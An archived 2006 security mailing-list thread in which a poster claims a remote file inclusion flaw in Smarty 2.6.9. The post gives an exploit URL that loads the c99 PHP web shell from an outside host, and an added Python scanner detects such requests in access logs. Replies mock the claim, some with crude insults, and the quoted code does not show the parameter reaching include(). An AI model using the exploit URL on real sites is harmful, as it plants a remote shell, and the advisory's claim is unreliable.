Mailing List Archive

Vuln
Hi I find a new vuln ...

the vuln :-

#########################################################

# Author :- Sp1deR_NeT

# E-mail :- Sp1deR_Net@Hotmail.Com

# Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com

# We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .

#########################################################

Script :- Smarty-2.6.9

Exploit :- libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?

Example :-
www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?

Vuln Code :-
/**
 * wrapper for include() retaining $this
 * @return mixed
 */
function _include($filename, $once=false, $params=null)
{
    if ($once) {
        return include_once($filename);
    } else {
        return include($filename);
    }
}
---------------------------------------------

Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.

---------------------------------------------

WwW.Sp1deR-N3T.Com ///\\\///\\\

=============Sp1deR_Net@Hotmail.Com==============

!@!@!@!@!@!

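Added example (not part of the original post or of Smarty): the request shape shown above, a file-path parameter whose value is a remote host and path ending in "?", can be searched for in web server access logs. The log lines, hosts and function names below are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines; hosts and paths are placeholders.
SAMPLE_LOG = """\
198.51.100.7 - - [14/Oct/2006:10:01:02 +0000] "GET /app/libs/Smarty.class.php?filename=remote.example/tools/shell.txt? HTTP/1.1" 200 0
198.51.100.7 - - [14/Oct/2006:10:01:09 +0000] "GET /app/index.php?page=http%3A%2F%2Fremote.example%2Fx.txt%3F HTTP/1.1" 200 512
203.0.113.20 - - [14/Oct/2006:10:02:11 +0000] "GET /app/index.php?page=news&id=42 HTTP/1.1" 200 2048
203.0.113.20 - - [14/Oct/2006:10:03:40 +0000] "GET /app/download.php?filename=report-2006.pdf HTTP/1.1" 200 9001
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A scheme:// prefix, or a bare host.tld/path value as in the post's URL.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)
BARE_HOST_RE = re.compile(r'^(?:[a-z0-9-]+\.)+[a-z]{2,}/\S+', re.I)


def remote_include_indicators(value):
    """Return the reasons a decoded parameter value looks like a remote target."""
    reasons = []
    if SCHEME_RE.match(value):
        reasons.append("url-scheme")
    elif BARE_HOST_RE.match(value):
        reasons.append("bare-host-path")
    # A trailing '?' turns any suffix the application appends into a query string.
    if reasons and value.endswith("?"):
        reasons.append("trailing-question-mark")
    return reasons


def scan(log_text):
    """Return (client, path, param, reasons) for each suspicious parameter."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        for name, value in parse_qsl(parts.query):  # parse_qsl percent-decodes
            reasons = remote_include_indicators(value)
            if reasons:
                findings.append((client, parts.path, name, reasons))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit only shows that such a request was sent; whether the application ever passes the parameter to include() has to be checked in the code.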
Re: Vuln [ In reply to ]
are you fucking stupid or just retarded?


On 10/14/06, hitham hitham <sp1der_net@hotmail.com> wrote:
>
> Hi I find a new vuln ...
Re: Vuln [ In reply to ]
I didn't know those were mutually exclusive. That's like asking your
mom if she is a slut or a whore. Aren't they one and the same?

On 10/15/06, upb <upbupb@gmail.com> wrote:
>
> are you fucking stupid or just retarded?
>
>
> On 10/14/06, hitham hitham <sp1der_net@hotmail.com> wrote:
> >
> > Hi I find a new vuln ...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: Vuln [ In reply to ]
On 10/15/06, Pink Hat <pinkhat.h4x0r@gmail.com> wrote:
> I didn't know those were mutually exclusive. That's like asking your
> mom if she is a slut or a whore. Aren't they one and the same?

As I said to Pink Hat: "One's freeware, the other is payware."

The more I think about it, the more it's like software licensing:
- some encourage you to share
- some permit you to create derivative works
- some have viral licenses
- some licenses have severable clauses
- there's the whole issue of market penetration
- showing off the patent may cause you to pay for the product

There's more, but I'll leave them for someone else.

CK

--
GDB has a 'break' feature; why doesn't it have 'fix' too?

Re: Vuln [ In reply to ]
On Sun, 15 Oct 2006 14:19:08 -0500 Pink Hat
<pinkhat.h4x0r@gmail.com> wrote:
>I didn't know those were mutually exclusive. That's like asking your
>mom if she is a slut or a whore. Aren't they one and the same?

Disagreements, flames, arguments, and off-topic discussion
should be taken off-list wherever possible.